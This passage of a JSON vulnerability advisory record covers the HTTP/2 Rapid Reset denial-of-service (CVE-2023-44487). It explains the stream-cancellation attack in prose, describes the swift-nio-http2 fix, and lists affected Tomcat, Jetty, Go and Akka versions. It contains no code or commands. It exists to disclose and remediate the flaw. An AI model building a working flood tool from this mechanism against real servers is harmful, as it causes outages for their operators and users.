"CGA-jqqv-mcm2-xfhf", "CGA-jrm6-4p39-vv8f", "CGA-m2rg-gw8g-jq3g", "CGA-m2vf-6j9c-q44v", "CGA-m2xm-59pf-m2w9", "CGA-m4ph-vwfq-6p88", "CGA-m6q6-3rm7-v7r7", "CGA-m929-58m9-46x7", "CGA-m96g-hjv2-7739", 
"CGA-mfww-9mm5-5q9p", "CGA-mh7x-f999-qfgr", "CGA-mh9m-rvrx-x78q", "CGA-mrg3-v5p6-fcrc", "CGA-mw67-9v22-xhfj", "CGA-mxmj-hx3p-86mr", "CGA-p3wv-wqgx-5f9g", "CGA-p488-4rp7-4vcq", "CGA-pm5v-cpg9-6pjv", "CGA-ppff-fghc-fmx2", "CGA-ppp5-rgx9-7cp5", "CGA-pvf6-v7vv-5pm8", "CGA-pwwr-2v47-j82m", "CGA-q23v-55fw-7wqq", "CGA-q2g4-fr75-mfgw", "CGA-q883-c6c7-5mrg", "CGA-q8f4-cjcq-pvcw", "CGA-q9x3-54qc-w4vx", "CGA-qf93-qqgg-57pp", "CGA-qg2x-rjrq-27j7", "CGA-qg4w-crjp-pm66", "CGA-qgcq-r8vq-cj48", "CGA-qj23-2j5c-346p", "CGA-qj39-h7mv-wvvr", "CGA-qqq4-xppr-35gx", "CGA-qrj8-7hhv-5fqr", "CGA-r3jw-5855-vm4v", "CGA-r3vf-8xgf-j7xf", "CGA-r65x-gccm-c3h9", "CGA-r672-cm53-wqp9", "CGA-r67v-7r7m-7mjm", "CGA-r6pc-j2w2-hg9j", "CGA-r83c-wr9j-cf47", "CGA-r8fq-45qw-f82f", "CGA-rfpm-7c5c-2jr7", "CGA-rh6x-pqw3-m94h", "CGA-rwg6-qrw3-mq94", "CGA-rwv7-vh72-vwm9", "CGA-rx36-6r58-w9cv", "CGA-v2x5-f8g9-xwxg", "CGA-v33m-mhpg-r9vc", "CGA-v69x-6w5f-9788", "CGA-v8m6-hgvj-q9jx", "CGA-v9r4-ppcg-99fx", "CGA-vg2f-7w94-hc6j", "CGA-vhg8-353g-xgjq", "CGA-vmv2-mcvh-c322", "CGA-vrwc-ghcx-vgf2", "CGA-vxx9-w3rw-hmm8", "CGA-w32j-65w7-364f", "CGA-w6jr-m8cm-cm2q", "CGA-w8w4-2885-pj8c", "CGA-w93r-jjhq-mrfj", "CGA-wcpm-f328-p4gm", "CGA-wcvh-j92g-4jf2", "CGA-wv77-q28p-3ccr", "CGA-wx95-wrvj-5fxq", "CGA-wxpj-97pc-mhgh", "CGA-x3c3-mgmr-7hfc", "CGA-x3gh-rmf6-3wm3", "CGA-x477-6cc3-862v", "CGA-x678-9j63-wf4w", "CGA-x7vm-wxp7-c7p6", "CGA-x866-fvq6-vg5f", "CGA-x87p-5crv-79j5", "CGA-x8gx-4p34-286q", "CGA-xfch-66rw-37j9", "CGA-xffp-8jxx-qx99", "CGA-xj77-2fg4-p9xh", "CGA-xq7r-vg65-qvmc", "CGA-xqpr-wh63-xxmp", "CGA-xr5x-637v-fqgc", "CGA-xxmc-xq95-99j2", "CVE-2023-44487" ], "summary": "HTTP/2 Stream Cancellation Attack", "details": "## HTTP/2 Rapid reset attack\nThe HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. 
The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed.\n\nAbuse of this feature is called a Rapid Reset attack because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open. \n\nThe HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately.\n\nThe ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth.\n\nIn a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client.\n\nMultiple software artifacts implementing HTTP/2 are affected. 
This advisory was originally ingested from the `swift-nio-http2` repo advisory and their original content follows.\n\n## swift-nio-http2 specific advisory\nswift-nio-http2 is vulnerable to a denial-of-service vulnerability in which a malicious client can create and then reset a large number of HTTP/2 streams in a short period of time. This causes swift-nio-http2 to commit to a large amount of expensive work which it then throws away, including creating entirely new `Channel`s to serve the traffic. This can easily overwhelm an `EventLoop` and prevent it from making forward progress.\n\nswift-nio-http2 1.28 contains a remediation for this issue that applies a reset counter using a sliding window. This constrains the number of stream resets that may occur in a given window of time. Clients violating this limit will have their connections torn down. This allows clients to continue to cancel streams for legitimate reasons, while constraining malicious actors.", "affected": [ { "package": { "name": "github.com/apple/swift-nio-http2", "ecosystem": "SwiftURL", "purl": "pkg:swift/github.com/apple/swift-nio-http2" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.28.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "golang.org/x/net", "ecosystem": "Go", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.17.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": 
"11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.0.0", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.16", "10.0.17", "10.0.18", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.26", "10.0.27", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", 
"9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { 
"source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.0.0", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.16", "10.0.17", "10.0.18", "10.0.2", "10.0.20", "10.0.21", "10.0.22", "10.0.23", "10.0.26", "10.0.27", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", 
"9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-common", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.4.53" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", 
"9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.52.v20230823", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-common", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.17" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.16", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-common", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.17" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.16", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.4.53" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", 
"9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.52.v20230823", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { 
"name": "org.eclipse.jetty.http2:http2-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.17" } ] } ], "versions": [ "10.0.0", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.16", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:http2-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/http2-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.17" } ] } ], "versions": [ "11.0.0", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.16", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:jetty-http2-common", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/jetty-http2-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0" }, { "fixed": "12.0.2" } ] } ], "versions": [ "12.0.0", "12.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "org.eclipse.jetty.http2:jetty-http2-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty.http2/jetty-http2-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0" }, { "fixed": "12.0.2" } ] } ], "versions": [ "12.0.0", "12.0.1" ], 
"database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "com.typesafe.akka:akka-http-core", "ecosystem": "Maven", "purl": "pkg:maven/com.typesafe.akka/akka-http-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "10.5.3" } ] } ], "versions": [ "3.0.0-RC1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "com.typesafe.akka:akka-http-core_2.13", "ecosystem": "Maven", "purl": "pkg:maven/com.typesafe.akka/akka-http-core_2.13" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "10.5.3" } ] } ], "versions": [ "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.8", "10.1.9", "10.2.0", "10.2.0-M1", "10.2.0-RC1", "10.2.0-RC2", "10.2.1", "10.2.10", "10.2.2", "10.2.3", "10.2.4", "10.2.5", "10.2.5-M1", "10.2.5-M2", "10.2.6", "10.2.7", "10.2.8", "10.2.9", "10.4.0", "10.4.0-M1", "10.4.0-M2", "10.5.0", "10.5.0-M1", "10.5.1", "10.5.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "com.typesafe.akka:akka-http-core_2.12", "ecosystem": "Maven", "purl": "pkg:maven/com.typesafe.akka/akka-http-core_2.12" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "10.5.3" } ] } ], "versions": [ "10.0.0", "10.0.0-RC2", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.6+7-e2ba6752", "10.0.7", "10.0.8", "10.0.9", "10.1.0", "10.1.0-RC1", "10.1.0-RC2", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.2", "10.1.3", "10.1.4", 
"10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9", "10.2.0", "10.2.0-M1", "10.2.0-RC1", "10.2.0-RC2", "10.2.1", "10.2.10", "10.2.2", "10.2.3", "10.2.4", "10.2.5", "10.2.5-M1", "10.2.5-M2", "10.2.6", "10.2.7", "10.2.8", "10.2.9", "10.4.0", "10.4.0-M1", "10.4.0-M2", "10.5.0", "10.5.0-M1", "10.5.1", "10.5.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-qppj-fm5r-hxr3/GHSA-qppj-fm5r-hxr3.json" } }, { "package": { "name": "com.typesafe.akka:akka-http-core_2.11", "ecosystem": "Maven", "purl": "pkg:maven/com.typesafe.akka/akka-http-core_2.11" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "10.1.15" } ] } ], "versions": [ "10.0.0", "10.0.0-RC2", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.6+7-e2ba6752", "10.0.7", "10.0.8", "10.0.9", "10.1.0", "10.1.0-RC1", "10.1.0-RC2", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.2", "10.1.3", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9", "2.4-ARTERY-M1", "2.4-ARTERY-M2", "2.4-ARTERY-M3", "2.4-ARTERY-M4", "2.4.10", "2.4.11", "2.4.11.1", "2.4.11.2", "2.4.2", "2.4.2-RC1", "2.4.2-RC2", "2.4.2-RC3", "2.4.3", "2.4.4", "2.4.5", "2.4.6", "2.4.7", "2.4.8", "2.4.9", "2.4.9-RC1", "2.4.9-RC2", "3.0.0-RC1" ], "database_specific": { "source": 